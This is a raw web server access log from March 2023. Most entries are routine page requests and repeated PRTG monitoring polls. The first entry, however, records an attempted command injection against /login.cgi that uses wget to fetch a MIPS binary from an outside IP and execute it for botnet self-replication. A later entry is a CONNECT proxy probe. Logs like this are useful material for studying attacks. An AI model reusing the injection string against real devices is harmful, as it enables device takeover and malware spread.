59.187.205.166 - - [05/Mar/2023:08:25:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.246.220.98 - - [05/Mar/2023:08:25:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
193.32.162.159 - - [05/Mar/2023:08:25:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:08:26:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:27:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:28:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.231.48.168 - - [05/Mar/2023:08:28:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Mar/2023:08:29:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:30:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:31:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:32:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:33:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:34:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:35:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:36:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:37:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.18.50.101 - - [05/Mar/2023:08:37:41 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
212.91.246.72 - - [05/Mar/2023:08:38:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:39:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:40:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
